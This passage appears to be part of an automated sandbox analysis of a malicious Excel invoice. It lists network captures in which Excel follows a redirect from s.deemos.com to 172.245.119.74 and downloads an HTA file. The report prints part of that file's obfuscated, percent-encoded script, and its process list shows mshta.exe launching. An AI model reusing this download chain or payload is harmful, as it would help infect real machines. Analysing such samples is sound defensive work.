                          Jan 16, 2025 08:26:19.808229923 CET4986580192.168.2.4172.245.119.74
                          Jan 16, 2025 08:26:19.808234930 CET8049865172.245.119.74192.168.2.4
                          Jan 16, 2025 08:26:19.808247089 CET8049865172.245.119.74192.168.2.4
                          Jan 16, 2025 08:26:19.808255911 CET4986580192.168.2.4172.245.119.74
                          Jan 16, 2025 08:26:19.808257103 CET8049865172.245.119.74192.168.2.4
                          Jan 16, 2025 08:26:19.808268070 CET8049865172.245.119.74192.168.2.4
                          Jan 16, 2025 08:26:19.808279037 CET8049865172.245.119.74192.168.2.4
                          Jan 16, 2025 08:26:19.808283091 CET4986580192.168.2.4172.245.119.74
                          Jan 16, 2025 08:26:19.808290005 CET8049865172.245.119.74192.168.2.4
                          Jan 16, 2025 08:26:19.808295965 CET4986580192.168.2.4172.245.119.74
                          Jan 16, 2025 08:26:19.808320045 CET4986580192.168.2.4172.245.119.74
                          Jan 16, 2025 08:26:19.808341980 CET4986580192.168.2.4172.245.119.74
                          Jan 16, 2025 08:26:19.808986902 CET8049865172.245.119.74192.168.2.4
                          Jan 16, 2025 08:26:19.808999062 CET8049865172.245.119.74192.168.2.4
                          Jan 16, 2025 08:26:19.809007883 CET8049865172.245.119.74192.168.2.4
                          Jan 16, 2025 08:26:19.809019089 CET8049865172.245.119.74192.168.2.4
                          Jan 16, 2025 08:26:19.809029102 CET8049865172.245.119.74192.168.2.4
                          Jan 16, 2025 08:26:19.809032917 CET4986580192.168.2.4172.245.119.74
                          Jan 16, 2025 08:26:19.809039116 CET8049865172.245.119.74192.168.2.4
                          Jan 16, 2025 08:26:19.809051037 CET8049865172.245.119.74192.168.2.4
                          Jan 16, 2025 08:26:19.809060097 CET8049865172.245.119.74192.168.2.4
                          Jan 16, 2025 08:26:19.809060097 CET4986580192.168.2.4172.245.119.74
                          Jan 16, 2025 08:26:19.809070110 CET4986580192.168.2.4172.245.119.74
                          Jan 16, 2025 08:26:19.809071064 CET8049865172.245.119.74192.168.2.4
                          Jan 16, 2025 08:26:19.809082031 CET8049865172.245.119.74192.168.2.4
                          Jan 16, 2025 08:26:19.809093952 CET8049865172.245.119.74192.168.2.4
                          Jan 16, 2025 08:26:19.809096098 CET4986580192.168.2.4172.245.119.74
                          Jan 16, 2025 08:26:19.809119940 CET4986580192.168.2.4172.245.119.74
                          Jan 16, 2025 08:26:19.809140921 CET4986580192.168.2.4172.245.119.74
                          Jan 16, 2025 08:26:19.811635017 CET8049865172.245.119.74192.168.2.4
                          Jan 16, 2025 08:26:19.811693907 CET4986580192.168.2.4172.245.119.74
                          Jan 16, 2025 08:26:19.848994970 CET4986580192.168.2.4172.245.119.74
                          Jan 16, 2025 08:26:19.849104881 CET4986580192.168.2.4172.245.119.74
                          TimestampSource PortDest PortSource IPDest IP
                          Jan 16, 2025 08:26:16.525863886 CET5728053192.168.2.41.1.1.1
                          Jan 16, 2025 08:26:16.870572090 CET53572801.1.1.1192.168.2.4
                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                          Jan 16, 2025 08:26:16.525863886 CET192.168.2.41.1.1.10x9eddStandard query (0)s.deemos.comA (IP address)IN (0x0001)false
                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                          Jan 16, 2025 08:26:00.605492115 CET1.1.1.1192.168.2.40x5718No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.netazurefd-t-fb-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                          Jan 16, 2025 08:26:00.605492115 CET1.1.1.1192.168.2.40x5718No error (0)dual.s-part-0017.t-0009.fb-t-msedge.nets-part-0017.t-0009.fb-t-msedge.netCNAME (Canonical name)IN (0x0001)false
                          Jan 16, 2025 08:26:00.605492115 CET1.1.1.1192.168.2.40x5718No error (0)s-part-0017.t-0009.fb-t-msedge.net13.107.253.45A (IP address)IN (0x0001)false
                          Jan 16, 2025 08:26:16.870572090 CET1.1.1.1192.168.2.40x9eddNo error (0)s.deemos.com14.103.79.10A (IP address)IN (0x0001)false
                          • s.deemos.com
                          • 172.245.119.74
                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          0192.168.2.449865172.245.119.74802496C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                          TimestampBytes transferredDirectionData
                          Jan 16, 2025 08:26:19.141917944 CET247OUTGET /xampp/ssw/reallynicegirlwithniceattitudegirlfriends.hta HTTP/1.1
                          Accept: */*
                          Accept-Encoding: gzip, deflate
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                          Connection: Keep-Alive
                          Host: 172.245.119.74
                          Jan 16, 2025 08:26:19.628907919 CET1236INHTTP/1.1 200 OK
                          Date: Thu, 16 Jan 2025 07:26:19 GMT
                          Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                          Last-Modified: Wed, 15 Jan 2025 01:31:56 GMT
                          ETag: "59501-62bb4a4a9a2f5"
                          Accept-Ranges: bytes
                          Content-Length: 365825
                          Keep-Alive: timeout=5, max=100
                          Connection: Keep-Alive
                          Content-Type: application/hta
                          Data Raw: 3c 73 63 72 69 70 74 3e 0d 0a 3c 21 2d 2d 0d 0a 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 76 61 72 20 64 20 3d 20 75 6e 65 73 63 61 70 65 28 22 25 36 32 25 36 36 25 36 36 25 33 31 25 33 32 25 36 35 25 33 38 25 33 36 25 36 33 25 33 39 25 33 37 25 36 36 25 33 34 25 33 31 25 33 35 25 33 30 25 32 30 25 36 34 25 32 38 25 33 33 25 32 37 25 33 38 25 33 64 25 33 34 25 32 39 25 36 33 25 34 63 25 35 38 25 35 31 25 35 30 25 32 32 25 30 61 25 32 30 25 35 31 25 34 39 25 35 38 25 34 35 25 36 33 25 34 63 25 35 38 25 35 38 25 35 34 25 37 30 25 34 39 25 35 35 25 35 39 25 34 64 25 35 61 25 32 31 25 36 35 25 33 63 25 37 30 25 33 39 25 32 35 25 37 30 25 32 37 25 35 33 25 35 31 25 35 34 25 34 35 25 35 38 25 34 64 25 34 36 25 35 30 25 34 39 25 36 35 25 36 33 25 34 37 25 35 33 25 35 32 25 35 38 25 34 39 25 35 32 25 35 38 25 32 31 25 36 35 25 32 64 25 32 39 25 32 31 25 32 39 25 35 31 25 35 39 25 35 30 25 34 35 25 35 38 25 34 39 25 32 64 25 32 39 25 37 62 25 36 35 25 36 33 25 32 32 25 30 61 25 32 30 25 34 63 [TRUNCATED]
                          Data Ascii: <script>...(function() { var d = unescape("%62%66%66%31%32%65%38%36%63%39%37%66%34%31%35%30%20%64%28%33%27%38%3d%34%29%63%4c%58%51%50%22%0a%20%51%49%58%45%63%4c%58%58%54%70%49%55%59%4d%5a%21%65%3c%70%39%25%70%27%53%51%54%45%58%4d%46%50%49%65%63%47%53%52%58%49%52%58%21%65%2d%29%21%29%51%59%50%45%58%49%2d%29%7b%65%63%22%0a%20%4c%58%51%50%22%0a%20%46%53%48%5d%22%0a%20%37%27%56%4d%34%38%63%38%5d%54%29%21%65%38%49%5c%38%72%5a%26%57%27%36%4d%34%58%65%22%0a%28%4d%31%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%6
                          Jan 16, 2025 08:26:19.628921032 CET224INData Raw: 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33
                          Data Ascii: 3%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%
                          Jan 16, 2025 08:26:19.628948927 CET1236INData Raw: 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36
                          Data Ascii: 63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%
                          Jan 16, 2025 08:26:19.628959894 CET1236INData Raw: 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36
                          Data Ascii: 63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%
                          Jan 16, 2025 08:26:19.628969908 CET1236INData Raw: 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36
                          Data Ascii: 63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%
                          Jan 16, 2025 08:26:19.628981113 CET1236INData Raw: 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36
                          Data Ascii: 63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%
                          Jan 16, 2025 08:26:19.628992081 CET1236INData Raw: 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36
                          Data Ascii: 63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%
                          Jan 16, 2025 08:26:19.629003048 CET1236INData Raw: 32 66 25 33 65 25 35 34 25 33 38 25 33 32 25 32 61 25 35 32 25 32 61 25 33 38 25 32 62 25 32 35 25 35 35 25 32 39 25 34 63 25 34 65 25 33 62 25 35 31 25 34 35 25 35 33 25 32 63 25 35 31 25 33 35 25 33 30 25 34 62 25 32 65 25 34 38 25 35 62 25 33
                          Data Ascii: 2f%3e%54%38%32%2a%52%2a%38%2b%25%55%29%4c%4e%3b%51%45%53%2c%51%35%30%4b%2e%48%5b%37%4d%35%37%35%37%57%2d%55%36%53%2d%4f%2c%2e%49%4e%4e%33%3b%27%2f%28%30%3e%50%39%5e%31%3e%2f%3b%47%5b%28%39%2f%4e%5d%46%45%57%33%33%3b%51%26%2c%59%46%3a%5e%45%3a%
                          Jan 16, 2025 08:26:19.629019976 CET1236INData Raw: 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36
                          Data Ascii: 63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%
                          Jan 16, 2025 08:26:19.629033089 CET1236INData Raw: 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36
                          Data Ascii: 63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%
                          Jan 16, 2025 08:26:19.633903027 CET1236INData Raw: 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36
                          Data Ascii: 63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          0192.168.2.44984914.103.79.104432496C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                          TimestampBytes transferredDirectionData
                          2025-01-16 07:26:18 UTC237OUTGET /fNsCo8xA?&priesthood=tame&quotation=pretty&mall HTTP/1.1
                          Accept: */*
                          Accept-Encoding: gzip, deflate
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                          Host: s.deemos.com
                          Connection: Keep-Alive
                          2025-01-16 07:26:19 UTC458INHTTP/1.1 302 Found
                          Date: Thu, 16 Jan 2025 07:26:18 GMT
                          Content-Type: text/plain; charset=utf-8
                          Content-Length: 99
                          Connection: close
                          X-DNS-Prefetch-Control: off
                          X-Frame-Options: SAMEORIGIN
                          Strict-Transport-Security: max-age=15724800; includeSubDomains
                          X-Download-Options: noopen
                          X-Content-Type-Options: nosniff
                          X-XSS-Protection: 1; mode=block
                          Location: http://172.245.119.74/xampp/ssw/reallynicegirlwithniceattitudegirlfriends.hta
                          Vary: Accept
                          2025-01-16 07:26:19 UTC99INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 37 32 2e 32 34 35 2e 31 31 39 2e 37 34 2f 78 61 6d 70 70 2f 73 73 77 2f 72 65 61 6c 6c 79 6e 69 63 65 67 69 72 6c 77 69 74 68 6e 69 63 65 61 74 74 69 74 75 64 65 67 69 72 6c 66 72 69 65 6e 64 73 2e 68 74 61
                          Data Ascii: Found. Redirecting to http://172.245.119.74/xampp/ssw/reallynicegirlwithniceattitudegirlfriends.hta


                          Click to jump to process

                          Click to jump to process

                          Click to dive into process behavior distribution

                          Click to jump to process

                          Target ID:0
                          Start time:02:25:22
                          Start date:16/01/2025
                          Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                          Wow64 process (32bit):true
                          Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                          Imagebase:0x810000
                          File size:53'161'064 bytes
                          MD5 hash:4A871771235598812032C822E6F68F19
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:false

                          Target ID:5
                          Start time:02:26:19
                          Start date:16/01/2025
                          Path:C:\Windows\SysWOW64\mshta.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\SysWOW64\mshta.exe -Embedding
                          Imagebase:0x90000
                          File size:13'312 bytes
                          MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:moderate
                          Has exited:false

                          Target ID:8
                          Start time:02:26:25
                          Start date:16/01/2025
                          Path:C:\Windows\splwow64.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\splwow64.exe 12288
                          Imagebase:0x7ff6b4d70000
                          File size:163'840 bytes
                          MD5 hash:77DE7761B037061C7C112FD3C5B91E73
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:false

                          Target ID:11
                          Start time:02:26:44
                          Start date:16/01/2025
                          Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                          Wow64 process (32bit):true
                          Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\Invoice#T5O2025.xls"
                          Imagebase:0x810000
                          File size:53'161'064 bytes
                          MD5 hash:4A871771235598812032C822E6F68F19
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Call Graph

                          • Entrypoint
                          • Decryption Function
                          • Executed
                          • Not Executed
                          • Show Help
                          callgraph 1 Error: Graph is empty

                          Module: Sheet1

                          Declaration
                          LineContent
                          1

                          Attribute VB_Name = "Sheet1"

                          2

                          Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                          3

                          Attribute VB_GlobalNameSpace = False

                          4

                          Attribute VB_Creatable = False

                          5

                          Attribute VB_PredeclaredId = True

                          6

                          Attribute VB_Exposed = True

                          7

                          Attribute VB_TemplateDerived = False

                          8

                          Attribute VB_Customizable = True

                          Module: Sheet2

                          Declaration
                          LineContent
                          1

                          Attribute VB_Name = "Sheet2"

                          2

                          Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                          3

                          Attribute VB_GlobalNameSpace = False

                          4

                          Attribute VB_Creatable = False

                          5

                          Attribute VB_PredeclaredId = True

                          6

                          Attribute VB_Exposed = True

                          7

                          Attribute VB_TemplateDerived = False

                          8

                          Attribute VB_Customizable = True

                          Module: Sheet3

                          Declaration
                          LineContent
                          1

                          Attribute VB_Name = "Sheet3"

                          2

                          Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                          3

                          Attribute VB_GlobalNameSpace = False

                          4

                          Attribute VB_Creatable = False

                          5

                          Attribute VB_PredeclaredId = True

                          6

                          Attribute VB_Exposed = True

                          7

                          Attribute VB_TemplateDerived = False

                          8

                          Attribute VB_Customizable = True

                          Module: ThisWorkbook

                          Declaration
                          LineContent
                          1

                          Attribute VB_Name = "ThisWorkbook"

                          2

                          Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"

                          3

                          Attribute VB_GlobalNameSpace = False

                          4

                          Attribute VB_Creatable = False

                          5

                          Attribute VB_PredeclaredId = True

                          6

                          Attribute VB_Exposed = True

                          7

                          Attribute VB_TemplateDerived = False

                          8

                          Attribute VB_Customizable = True

                          Reset < >